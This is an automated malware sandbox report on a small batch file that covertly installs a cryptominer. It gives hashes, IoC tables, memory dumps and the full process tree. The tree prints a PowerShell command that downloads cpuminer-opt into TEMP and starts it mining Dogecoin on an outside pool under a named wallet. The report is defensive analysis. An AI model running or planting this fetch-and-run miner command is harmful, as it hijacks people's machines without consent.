b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1793s
max time network
1798s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
03/02/2024, 03:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	876	powershell.exe
4	876	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2244	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe
2244	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
876	powershell.exe
876	powershell.exe
876	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	876	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3572 wrote to memory of 876	3572	cmd.exe	25
PID 3572 wrote to memory of 876	3572	cmd.exe	25
PID 876 wrote to memory of 4780	876	powershell.exe	76
PID 876 wrote to memory of 4780	876	powershell.exe	76
PID 4780 wrote to memory of 2244	4780	cmd.exe	78
PID 4780 wrote to memory of 2244	4780	cmd.exe	78

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:876
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4780
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2244

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_asa53nk5.tce.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
137KB

MD5
6e96a730da5746d4318f539acf94e98f

SHA1
a6339f4bb37421ce5d81a52647345cad4a6958ff

SHA256
99a3cddf77d39fd4a502fbfb120be46ab534d986eea15d592c266ae1872163cf

SHA512
2c1fa69c79343069be9dbc21a5e7f20d82bdff676e8634a48ad8a88273c20fec25441864742376e547b38e32a0b5273675f5f8abb4dab2098c4703897c6e7b53

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
74KB

MD5
0da308e8e07abe7afaa074553f4711e6

SHA1
3e890aa1e71ff8b5cc3a2d96dfab832a70b111ee

SHA256
b21d8c98314c080f4b3742dd568cdd7cccf8d3a51015c4e21194a6897d9c6e12

SHA512
236afece470aeae11928446ad523711ae81f9641e5868ffe9559e6a8828d6b16647c806c17fc6e23961d2525609240730ccf9b0a956e0a2844292be60ba4831d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
179KB

MD5
50a0a0815e137ad518e48c1134ebf298

SHA1
7c8ea7799751a0a6874fb7038f41ead01a9ebe1e

SHA256
dc870d01d57c15bac0741fc55ee6b2d453274e79c839e13db15e361420143951

SHA512
123fce715806ece380ac75ef5ab74675b4cb546c74b51212bf8b80de75dd9b9f8a022e2d163c6b44d10154d65abde4fd0f321f73335ade455bd1f5bc6c7d68a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
207KB

MD5
d08ebc6eb604a268578e779ea59f0ccb

SHA1
9dd7aa1462c2e2eee6879d8d37702f155d0521fe

SHA256
35c46bf40ebdd7a39b219be2d889fdeeb567673e9d2bfc79dff5dc26853182fd

SHA512
8a4706ecf9d133910058e69463cffd49387e850766475ca6d9e6c515db959a4aab343bfdc9ca6f6c86cd8fc5d184c737bb92469e394e96a93a5320caa8629302

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
65KB

MD5
31c89c40fc5fafed8f0a578be7a0884a

SHA1
33b0f6fcefe6619a85474b11258947500c14eb83

SHA256
cf005e094e9ec19b6d2c932fb25baa0717cdc4843dede40ce5c645ba018a5e85

SHA512
5ef6e037e04c88f2e38c33e6666433718fcc351e8c2b7d8ee1c7110e34736aca2051e0df5f9ab49274745ef5d05da3290d4f6b9804d9ae2117a9c2bea32431d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
83KB

MD5
069b4ef51f8095c760a0f6b7bf4e5f98

SHA1
f97c846b60cb92223f6a00c3ed014a77515b840e

SHA256
50af103cc68cda07e9ba9314c0c3d92be447fb91a9f6621b332e89ed874ede5b

SHA512
5db1ac8a3f5a30d29d660ecc7bada996476672b673a187597908bbb79ee669fca6abee4cfa573b12ecafa3a850c97f9585e4e410559fd20b4dce2ac5a8a10e52

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
128KB

MD5
54770d334455129e53f7cf689b1705ff

SHA1
47afbba9f0a636406c329f5eb36864553eb7fa61

SHA256
732bfd1b95877968e76035c83b70c5caebe448ea5bef017f9b45c1c806bd799e

SHA512
d30026137f796a5c8e88e0af46db05aa62574ce30cbe55c4255a821639f50aef93177eec629bddd19cbf25099e3f0702db3de37102156c633e95ebd163910326

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
153KB

MD5
bba55a40abd55f190515effaf90afd9c

SHA1
56d1298d873b485285da5613db5ce9cd884c8b59

SHA256
95275df0475ef63433e189b44d59b02eaae6ebdda019a3d4bd6fc206723cb57e

SHA512
c27bff6968d6620262a48a058a3039dac7d812e6e99213edb3f01b194a12f44efbc8a557041481fdc359069f95e1e2614d6725bab8fc29be4db27f1fa4b50842

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
97KB

MD5
098f929c7ed35efa06d248d3d556a41a

SHA1
1e291b69d26ab58ee5f1c954a4e9a67dca321e1e

SHA256
590b9437a8bfae9ced9ac3dfe9d6250593669d99c91e3c9ad3059b2602ec3761

SHA512
837669dd8c449a4c38a69bb8c3ec335239208a1653a664d08ae3e5f65f76960cfcafc873db6a5feb1ff003bce3244d30f5f860b1b0e8358c692c857766e86d97

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
78KB

MD5
5888f9be5a7e50a4bb0fa002e4449bae

SHA1
9d5a90db951736f5c588c18b33a48e1d59692b9a

SHA256
b0fffa1954cb15e7137ffd985c9a569aac242c80b39220e660f63a2ae1a47634

SHA512
8d83c9f97c14d4c456e21ecd77162a620f3e8b3992d2d6baf06445b6f9e3e0962c099f5123cbbdda0f933a7f11e89215d553ab578076f1fa3c9aed5e2f12e886

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
157KB

MD5
35af484b9d0c2997b0fdb9c4c2e10ea7

SHA1
58ecab4267b78850cdb3e71385dfc941de3f5509

SHA256
febcde7b8e9d151350c8782021b29f48b5021a19ba43613a3bf9dd6c940e1f86

SHA512
65718da6b132eb6d42aa8920d1a1153a8e5f94b3006840eec711404b20c8dc6bf79132e879eef4202571fb71ca1b1291d3689bde42a1e3bca6b86cb607ae6227

Download Submit
memory/876-32-0x000001D69F380000-0x000001D69F390000-memory.dmp

Filesize
64KB

Download
memory/876-65-0x000001D69F310000-0x000001D69F31A000-memory.dmp

Filesize
40KB

Download
memory/876-52-0x000001D69F320000-0x000001D69F332000-memory.dmp

Filesize
72KB

Download
memory/876-4-0x000001D69F3C0000-0x000001D69F3E2000-memory.dmp

Filesize
136KB

Download
memory/876-31-0x000001D69F380000-0x000001D69F390000-memory.dmp

Filesize
64KB

Download
memory/876-30-0x00007FFCDAB90000-0x00007FFCDB57C000-memory.dmp

Filesize
9.9MB

Download
memory/876-26-0x000001D69F380000-0x000001D69F390000-memory.dmp

Filesize
64KB

Download
memory/876-7-0x000001D69F380000-0x000001D69F390000-memory.dmp

Filesize
64KB

Download
memory/876-9-0x000001D69F380000-0x000001D69F390000-memory.dmp

Filesize
64KB

Download
memory/876-10-0x000001D69F4F0000-0x000001D69F566000-memory.dmp

Filesize
472KB

Download
memory/876-5-0x00007FFCDAB90000-0x00007FFCDB57C000-memory.dmp

Filesize
9.9MB

Download
memory/876-108-0x00007FFCDAB90000-0x00007FFCDB57C000-memory.dmp

Filesize
9.9MB

Download
memory/2244-123-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2244-146-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-122-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2244-125-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2244-121-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-131-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-134-0x00000000664F0000-0x0000000066588000-memory.dmp

Filesize
608KB

Download
memory/2244-124-0x00000000664F0000-0x0000000066588000-memory.dmp

Filesize
608KB

Download
memory/2244-154-0x00000000664F0000-0x0000000066588000-memory.dmp

Filesize
608KB

Download
memory/2244-166-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-169-0x00000000664F0000-0x0000000066588000-memory.dmp

Filesize
608KB

Download
memory/2244-181-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2244-183-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2244-184-0x00000000664F0000-0x0000000066588000-memory.dmp

Filesize
608KB

Download